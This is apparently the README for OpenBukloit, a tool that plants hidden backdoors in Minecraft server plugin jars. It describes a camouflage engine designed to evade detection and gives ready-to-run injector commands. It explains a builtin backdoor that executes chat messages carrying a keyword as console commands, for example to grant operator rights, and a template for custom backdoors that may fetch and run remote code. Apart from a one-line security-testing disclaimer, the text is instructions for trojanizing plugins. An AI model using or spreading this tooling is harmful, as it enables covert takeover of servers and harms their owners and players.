Languages: English, Русский, Українська
OpenBukloit is modern and powerful universal backdoor injector compatible with all Bukkit/Spigot/Paper/etc plugins. Its feature is ability to integrate with absolutely any plugin without the need to modify backdoor every time. Moreover, it provides powerful camouflage engine, which makes nearly impossible to find it without sufficient knowledge or advanced automated tools. OpenBukloit was developed to test the security systems of Minecraft servers, VoxelHax team is not responsible for its misuse.
This is a continuation of Bukloit project, taking into account all the problems of the previous project and a completely different approach to development.
In order to use OpenBukloit you must have any Java version installed (but not lower than 8). OpenBukloit jar can be downloaded from releases tab. OpenBukloit does not require any additional actions, just put jar file somewhere and use it from command line.
To run OpenBukloit, open command prompt in the directory where OpenBukloit jar is located and type:
java -jar OpenBukloit.jar
After jar file name you can pass some arguments to configure injector:
Short Argument | Long Argument | Description | Type |
---|---|---|---|
-e | --exploit | Path to custom .java or compiled .class file, that will be used as backdoor.By default uses builtin backdoor. | Value |
-m | --mode | Mode. Can be single/multiple.Default: multiple.In multiple mode, modifies all files in the specified folder. In single - only the specified file. | Value |
-i | --input | Path to input folder/file (mode dependent).Default: in (in.jar if mode is single). | Value |
-o | --output | Path to output folder/file (mode dependent).Default: out (out.jar if mode is single). | Value |
-r | --replace | Replace output file if it already exists. | Flag |
--no-camouflage | Do not apply camouflage (may be useful when camouflage not working correctly due to plugin obfuscation). | Flag | |
--class-name |
Works only with --no-camouflage flag! Specify custom exploit class name (can include package, example: com.voxelhax.OpenBukloitExploit ). |
Value | |
--method-name |
Works only with --no-camouflage flag! Specify custom name for inject exploit method. |
Value |
But these arguments are not enough to run OpenBukloit. You must also specify backdoor params. Because OpenBukloit supports injecting of custom backdoors, you must pass additional arguments that required by used backdoor.
By default, OpenBukloit injects builtin backdoor. It is a simple backdoor that allows you to execute any commands as console by writing special keyword before command in chat.
Builtin backdoor params:
Long Argument | Description |
---|---|
--key | Keyword, that triggers console command execution. |
Ingame usage for key set to "hackthisserver":
hackthisserver op MyName
This message sent to chat will be executed as console command and give op to MyName player.
Here is some examples of using OpenBukloit with builtin backdoor:
java -jar OpenBukloit.jar -m multiple -i "in" -o "out" --key "#console"
java -jar OpenBukloit.jar -m multiple -i "in" -o "out" --key "hacktheserver" -r
java -jar OpenBukloit.jar -m single -i "PluginName.jar" -o "Output.jar" --key "#console" -r
java -jar OpenBukloit.jar -m single -i "PluginName.jar" -o "Output.jar" --key "#console" -r --no-camouflage --class-name "com.voxelhax.OpenBukloitExploit"
You can also write your own backdoor. It should be a class with public static void inject(JavaPlugin args)
method (JavaPlugin is from Bukkit API).
Here is a simple example:
import org.bukkit.plugin.java.JavaPlugin;
public class MyBackdoor {
public static void inject(JavaPlugin args) {
System.out.println("Hello, world!");
}
}
inject
method will be executed after plugin's onEnable
method. You can do everything you want here, including downloading and running some arbitrary code from internet.
But you must know that there are some limitations:
You can take external params from command line, by using %placeholders%, thay will be replaced during injection:
import org.bukkit.plugin.java.JavaPlugin;
public class MyBackdoor {
public static void inject(JavaPlugin args) {
System.out.println("Hello, %name%!");
}
}
And then inject it with command:
java -jar OpenBukloit.jar -e MyBackdoor.java --name world
Note, that we can pass our backdoor to OpenBukloit without compiling, and it will automatically compile it with Spigot API in compiletime classpool.